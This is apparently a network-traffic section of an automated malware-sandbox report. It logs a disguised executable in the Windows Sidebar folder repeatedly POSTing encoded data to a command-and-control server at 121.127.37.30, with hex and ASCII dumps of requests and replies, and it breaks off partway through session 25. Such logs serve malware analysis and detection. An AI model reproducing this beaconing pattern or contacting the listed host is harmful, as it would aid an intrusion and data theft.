                                                13 | 192.168.2.7 | 49781 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:39.405297995 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:39.752846956 CET | 2564 | OUT | Data Raw: 50 51 5a 59 5e 59 51 58 5e 5e 51 57 50 5d 5a 51 59 52 58 47 5b 55 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZY^YQX^^QWP]ZQYRXG[UR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>?$1U#'+)>%<]*!Y+)!,+8,&>=(!Y""Z)
                                                Dec 5, 2024 16:02:40.728463888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:40.964612007 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:40 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.7 | 49786 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:41.197993994 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:41.549642086 CET | 2564 | OUT | Data Raw: 50 55 5a 5f 5b 5b 54 58 5e 5e 51 57 50 5b 5a 5b 59 52 58 40 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZ_[[TX^^QWP[Z[YRX@[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+?10*#8X);'+5=3^!?#V*2/Z<0'.)+!Y""Z)!


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.7 | 49792 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:42.374336004 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:42.721857071 CET | 1452 | OUT | Data Raw: 50 5f 5a 52 5b 5d 54 59 5e 5e 51 57 50 5d 5a 5b 59 57 58 43 5b 57 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P_ZR[]TY^^QWP]Z[YWXC[WRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=?>]'/2#Q;>8;?%+=;";T>7[+&==T?!Y""Z)
                                                Dec 5, 2024 16:02:43.701138020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:43.936393023 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 58 23 2e 2e 59 34 3a 34 0a 39 3d 3f 02 24 20 32 0a 32 23 09 05 32 3d 3a 0f 25 5d 2c 08 22 3b 2f 5b 21 5f 2f 16 21 3f 2b 58 33 0d 28 46 0c 1d 22 5b 24 01 2e 0e 3d 07 30 50 38 2c 22 1a 3e 33 35 01 2e 10 36 1b 3d 1d 0f 56 28 3a 3e 51 32 28 2b 01 27 3a 07 02 28 23 09 12 27 25 20 53 00 14 25 55 3d 1f 31 1f 3e 11 39 5c 36 3c 0e 1d 28 2b 0c 1d 31 38 29 0d 27 24 28 05 31 3a 38 56 23 0e 2b 1c 3e 3e 26 11 32 3c 3f 02 29 09 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: X#..Y4:49=?$ 22#2=:%],";/[!_/!?+X3(F"[$.=0P8,">35.6=V(:>Q2(+':(#'% S%U=1>9\6<(+18)'$(1:8V#+>>&2<?)&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.7 | 49793 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:42.496829987 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:42.846577883 CET | 2564 | OUT | Data Raw: 55 53 5f 58 5e 58 54 5f 5e 5e 51 57 50 53 5a 5e 59 54 58 47 5b 52 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: US_X^XT_^^QWPSZ^YTXG[RR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)>$<=Q"7)],Y((\+9$"/*"?(((]06<?!Y""Z)
                                                Dec 5, 2024 16:02:43.829968929 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:44.068679094 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.7 | 49799 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:44.307497978 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:44.659055948 CET | 2564 | OUT | Data Raw: 55 51 5f 58 5b 5f 51 59 5e 5e 51 57 50 5d 5a 5d 59 55 58 49 5b 5f 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQ_X[_QY^^QWP]Z]YUXI[_R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y)?53<! 7)8+=<!?T)^(( '>9U+!Y""Z)
                                                Dec 5, 2024 16:02:45.634993076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:45.860934019 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:45 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.7 | 49804 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:46.104312897 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:46.456175089 CET | 2564 | OUT | Data Raw: 50 5f 5f 5b 5e 5e 51 5d 5e 5e 51 57 50 5d 5a 5f 59 54 58 49 5b 54 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P__[^^Q]^^QWP]Z_YTXI[TR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^)60Y=77+*$Y<%+:4!<?W>_<<\'?/!Y""Z)
                                                Dec 5, 2024 16:02:47.428924084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:47.668637037 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:47 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.7 | 49806 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:47.918567896 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:48.268506050 CET | 2564 | OUT | Data Raw: 50 50 5f 58 5e 59 54 5a 5e 5e 51 57 50 53 5a 58 59 5d 58 41 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PP_X^YTZ^^QWPSZXY]XA[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9>>^0?% '?>;(_?5 +:$"/(!_+('=5+!Y""Z)


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.2.7 | 49812 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:49.062359095 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:49.411442995 CET | 1452 | OUT | Data Raw: 50 53 5f 59 5e 5c 51 5e 5e 5e 51 57 50 5d 5a 5a 59 54 58 40 5b 54 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PS_Y^\Q^^^QWP]ZZYTX@[TR\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^=Y.]'/&#';*+_+68X= 6?U>+(;33.6*?!Y""Z)
                                                Dec 5, 2024 16:02:50.387979031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:50.621937990 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 10 20 3d 35 01 37 29 24 0f 2e 10 3c 10 27 1e 26 41 32 0d 33 00 25 04 3a 0f 26 38 27 1b 35 02 33 5d 22 00 2b 14 23 3c 2c 03 27 0d 28 46 0c 1d 22 13 24 28 2e 0c 2b 2a 34 57 2f 3f 21 43 28 23 08 13 2d 10 04 55 3f 20 25 57 28 3a 39 09 31 06 37 01 24 39 3a 15 29 20 24 06 26 35 20 53 00 14 25 55 29 0f 26 0e 2a 2f 25 5d 22 12 24 50 28 05 3e 5a 25 02 2e 50 26 24 09 5c 27 39 38 11 34 0e 33 1f 29 00 31 05 32 02 38 5b 3e 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: =57)$.<'&A23%:&8'53]"+#<,'(F"$(.+*4W/?!C(#-U? %W(:917$9:) $&5 S%U)&*/%]"$P(>Z%.P&$\'9843)128[>&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.2.7 | 49813 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:49.191667080 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:49.549988031 CET | 2564 | OUT | Data Raw: 50 52 5a 59 5b 5d 54 59 5e 5e 51 57 50 52 5a 58 59 57 58 41 5b 57 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZY[]TY^^QWPRZXYWXA[WRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9="Y$<&4*'+58X>)["<+U* <0(/!Y""Z)
                                                Dec 5, 2024 16:02:50.520759106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:50.754431963 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.2.7 | 49819 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:50.998230934 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:51.346616030 CET | 2564 | OUT | Data Raw: 50 55 5f 5f 5e 51 54 5d 5e 5e 51 57 50 5e 5a 5e 59 50 58 48 5b 54 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PU__^QT]^^QWP^Z^YPXH[TRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<!&,9P#?+(#</=;X6<*W +8\$=1(!Y""Z)5
                                                Dec 5, 2024 16:02:52.318789959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:52.552360058 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:52 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.2.7 | 49824 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:52.850572109 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:53.205964088 CET | 2560 | OUT | Data Raw: 55 52 5a 5c 5e 50 51 5a 5e 5e 51 57 50 5a 5a 51 59 5c 58 42 5b 52 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: URZ\^PQZ^^QWPZZQY\XB[RR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)/>&<-U7$*#>5);5<'*+($-=W?!Y""Z)
                                                Dec 5, 2024 16:02:54.170059919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:54.404630899 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:53 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                24 | 192.168.2.7 | 49829 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:54.652755976 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:55.002866983 CET | 2564 | OUT | Data Raw: 50 57 5a 5c 5e 59 51 58 5e 5e 51 57 50 58 5a 5f 59 53 58 40 5b 50 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PWZ\^YQX^^QWPXZ_YSX@[PR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+<.&/!7'4);(&?)457R)?[(8(X&>=R+!Y""Z)-


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                25 | 192.168.2.7 | 49832 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:55.749274969 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
